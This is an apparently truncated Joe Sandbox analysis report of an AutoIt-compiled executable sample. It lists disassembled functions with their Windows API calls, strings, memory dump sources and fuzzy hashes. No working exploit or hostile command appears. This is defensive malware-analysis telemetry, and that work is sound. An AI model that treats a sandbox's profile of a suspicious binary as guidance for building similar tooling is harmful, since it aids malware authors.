                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003AC3D4
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003AC41C
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AC454
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AC489
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                    • Opcode ID: 7c4eadc671c7c65a4d6525f322078372bb2b3838b27bccdd0370de5132f704d0
                                                                                                                    • Instruction ID: 24f9a5e15bab2347fc7ed316b6e203b39cef1cba15d79f5cfe41b354e8845f45
                                                                                                                    • Opcode Fuzzy Hash: 7c4eadc671c7c65a4d6525f322078372bb2b3838b27bccdd0370de5132f704d0
                                                                                                                    • Instruction Fuzzy Hash: ED81BE70618301AFDB22CF25C884A6BBBE8FF8A314F00592EF99597291C730D904CB92
                                                                                                                    Function 0039731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0039738F
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0039739B
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 003973A7
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 003973B4
                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00397408
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00397444
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00397468
                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 00397470
                                                                                                                    • DeleteObject.GDI32(?), ref: 00397479
                                                                                                                    • DeleteDC.GDI32(00000006), ref: 00397480
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0039748B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: e91aa368f5f666325248a322b0523021e0677d38e232b1a87dfe4cfcd7a69272
                                                                                                                    • Instruction ID: 3d6ca94aaae3cf109747df64deb31264b4a01659d0bc939b5d22e8a64c936cc4
                                                                                                                    • Opcode Fuzzy Hash: e91aa368f5f666325248a322b0523021e0677d38e232b1a87dfe4cfcd7a69272
                                                                                                                    • Instruction Fuzzy Hash: CC515A75A04309EFCB16CFA9CC85EAEBBB9EF49310F14842DF99997251C731A940CB90
                                                                                                                    Function 00326A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00326B0C,?,00008000), ref: 00340973
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00326BAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00326CFA
                                                                                                                      • Part of subcall function 0032586D: _wcscpy.LIBCMT ref: 003258A5
                                                                                                                      • Part of subcall function 0034363D: _iswctype.LIBCMT ref: 00343645
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                    • Opcode ID: 02a645554e53e884b94641dd0ec97cfe5c4b8bfd215d34354dcb912b7e532a8d
                                                                                                                    • Instruction ID: 1c5e13f2b33590d65acb30089ad35a79488bcc2b3c4dd395fe2212031ebe2b3a
                                                                                                                    • Opcode Fuzzy Hash: 02a645554e53e884b94641dd0ec97cfe5c4b8bfd215d34354dcb912b7e532a8d
                                                                                                                    • Instruction Fuzzy Hash: FC02BF311083519FC726EF24D881AAFBBE5FF99354F10491DF8899B2A1DB30DA49CB52
                                                                                                                    Function 00382D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00382D50
                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00382DDD
                                                                                                                    • GetMenuItemCount.USER32(003E5890), ref: 00382E66
                                                                                                                    • DeleteMenu.USER32(003E5890,00000005,00000000,000000F5,?,?), ref: 00382EF6
                                                                                                                    • DeleteMenu.USER32(003E5890,00000004,00000000), ref: 00382EFE
                                                                                                                    • DeleteMenu.USER32(003E5890,00000006,00000000), ref: 00382F06
                                                                                                                    • DeleteMenu.USER32(003E5890,00000003,00000000), ref: 00382F0E
                                                                                                                    • GetMenuItemCount.USER32(003E5890), ref: 00382F16
                                                                                                                    • SetMenuItemInfoW.USER32(003E5890,00000004,00000000,00000030), ref: 00382F4C
                                                                                                                    • GetCursorPos.USER32(?), ref: 00382F56
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00382F5F
                                                                                                                    • TrackPopupMenuEx.USER32(003E5890,00000000,?,00000000,00000000,00000000), ref: 00382F72
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00382F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3993528054-0
                                                                                                                    • Opcode ID: 44e00285fd90e609ffa1cea11bdde56bacbe592de9fc2e1b83eb94299d113943
                                                                                                                    • Instruction ID: 240e784d49c46febf80bfba813d149e0fd9d07b4079484e15bfb5fc387512a8a
                                                                                                                    • Opcode Fuzzy Hash: 44e00285fd90e609ffa1cea11bdde56bacbe592de9fc2e1b83eb94299d113943
                                                                                                                    • Instruction Fuzzy Hash: FC71B270640305BEEB23AF64DC89FABBF68FF05354F140256F625AA1E1C7B16820D794
                                                                                                                    Function 003988AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003988D7
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00398904
                                                                                                                    • CoUninitialize.OLE32 ref: 0039890E
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00398A0E
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00398B3B
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003B2C0C), ref: 00398B6F
                                                                                                                    • CoGetObject.OLE32(?,00000000,003B2C0C,?), ref: 00398B92
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00398BA5
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00398C25
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00398C35
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    • String ID: ,,;
                                                                                                                    • API String ID: 2395222682-1177347100
                                                                                                                    • Opcode ID: 1439bd1fc63114c3379de12d5f05abfd6f272c73ae5721e7ede7b42a5da7b25b
                                                                                                                    • Instruction ID: 9abf08904dbfdf0f636b91490ba95d5cd2fd71a427d264e692e5e10335e70759
                                                                                                                    • Opcode Fuzzy Hash: 1439bd1fc63114c3379de12d5f05abfd6f272c73ae5721e7ede7b42a5da7b25b
                                                                                                                    • Instruction Fuzzy Hash: 6EC136B1608305AFDB01DF68C88496BB7E9FF8A348F04491DF98A9B251DB71ED05CB52
                                                                                                                    Function 003777DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • _memset.LIBCMT ref: 0037786B
                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003778A0
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003778BC
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003778D8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00377902
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037792A
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00377935
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037793A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                    • Opcode ID: 057ce387746124469e30c35ce6ca9020271d81ba229389185fcb785f76403021
                                                                                                                    • Instruction ID: 4b584982b4337f4bc5adf72b41b0750e5cb2bda989662612f86fa71c4cae9770
                                                                                                                    • Opcode Fuzzy Hash: 057ce387746124469e30c35ce6ca9020271d81ba229389185fcb785f76403021
                                                                                                                    • Instruction Fuzzy Hash: 4141FA72C14229ABCF22EFA4EC45DEDB778BF04350F414469E915A7161EB349E04CB90
                                                                                                                    Function 003A0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039FDAD,?,?), ref: 003A0E31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: 33fa86c5e372472a1b3d3fd862c7ff541f376da7fe263870f73a09720662a250
                                                                                                                    • Instruction ID: 614ff43b23a9083499694168e2232e5af618d28c8241db821597a8822aab87cc
                                                                                                                    • Opcode Fuzzy Hash: 33fa86c5e372472a1b3d3fd862c7ff541f376da7fe263870f73a09720662a250
                                                                                                                    • Instruction Fuzzy Hash: 6A413D3664024A8FCF1BEF10E895AEE37A4FF12354F150456FC552F292DB34A95ACBA0
                                                                                                                    Function 0037F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0035E2A0,00000010,?,Bad directive syntax error,003AF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0037F7C2
                                                                                                                    • LoadStringW.USER32(00000000,?,0035E2A0,00000010), ref: 0037F7C9
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • _wprintf.LIBCMT ref: 0037F7FC
                                                                                                                    • __swprintf.LIBCMT ref: 0037F81E
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0037F88D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 1506413516-4153970271
                                                                                                                    • Opcode ID: 0cda302c74da3ace6b22f8e5714618040067fb2524b1d2d641be970e38470425
                                                                                                                    • Instruction ID: 40fab282a51a131c7a989c673c4758e153001b55888a21e5d9fc6f246ec0159c
                                                                                                                    • Opcode Fuzzy Hash: 0cda302c74da3ace6b22f8e5714618040067fb2524b1d2d641be970e38470425
                                                                                                                    • Instruction Fuzzy Hash: 69214F3294022EBFCF13EF90DC4AEEE7779BF14300F044466F5156A1A1DA71A658DB51
                                                                                                                    Function 003852C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                      • Part of subcall function 00327924: _memmove.LIBCMT ref: 003279AD
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00385330
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00385346
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00385357
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00385369
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0038537A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_memmove
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                    • Opcode ID: 171489db32578356c8d03c623c23b61f79547b6ae23545c8f95694b17ea350e1
                                                                                                                    • Instruction ID: 0876bb5ae96c0a4c514479e9eb5a8b08277d99beadaffa0c1ac2a714043abb06
                                                                                                                    • Opcode Fuzzy Hash: 171489db32578356c8d03c623c23b61f79547b6ae23545c8f95694b17ea350e1
                                                                                                                    • Instruction Fuzzy Hash: D8119432A5023979D762BB75EC4AEFF7B7CFB92B50F00046AB401A61D1DEA05D45CAA0
                                                                                                                    Function 003846B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                    • Opcode ID: 23ac226ac57ac7dbdd13d1299d8bd033aee1e0cdc980e94b29e143f077a3d415
                                                                                                                    • Instruction ID: 639e20219a986788492dba0dead4e08048fdcf0f16a539e1fb1041a933827a26
                                                                                                                    • Opcode Fuzzy Hash: 23ac226ac57ac7dbdd13d1299d8bd033aee1e0cdc980e94b29e143f077a3d415
                                                                                                                    • Instruction Fuzzy Hash: EF11E7319002156FCB27BB709C4AEDA7BBCEF02711F0401BAF5559A091EF75D9818750
                                                                                                                    Function 00384F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00384F7A
                                                                                                                      • Part of subcall function 0034049F: timeGetTime.WINMM(?,7694B400,00330E7B), ref: 003404A3
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00384FA6
                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00384FCA
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00384FEC
                                                                                                                    • SetActiveWindow.USER32 ref: 0038500B
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00385019
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00385038
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00385043
                                                                                                                    • IsWindow.USER32 ref: 0038504F
                                                                                                                    • EndDialog.USER32(00000000), ref: 00385060
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: 91cd9502e876b73cda4cf8f9c182aa9af04c42cf74090e222dccbc3b19542e87
                                                                                                                    • Instruction ID: 95fbc8c9a45e7cbc4d7dccf69d2add51fc9851d33b1b316571ee558aff3dc70e
                                                                                                                    • Opcode Fuzzy Hash: 91cd9502e876b73cda4cf8f9c182aa9af04c42cf74090e222dccbc3b19542e87
                                                                                                                    • Instruction Fuzzy Hash: 4A21A170604B45AFE7236FB0ECC9A363BADEB17785F041168F2028A2F1DB718D008B61
                                                                                                                    Function 0038D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038D5EA
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0038D67D
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0038D691
                                                                                                                    • CoCreateInstance.OLE32(003B2D7C,00000000,00000001,003D8C1C,?), ref: 0038D6DD
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0038D74C
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0038D7A4
                                                                                                                    • _memset.LIBCMT ref: 0038D7E1
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0038D81D
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0038D840
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0038D847
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0038D87E
                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0038D880
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: 4353c8540880e7b1092cafd08b3081c4fbd77e070fb81709c8b777d1aeab0d1c
                                                                                                                    • Instruction ID: 62453fd30b85f1aec6dd71cf3a2f577b9f679db00d2fc5586b818e7893980175
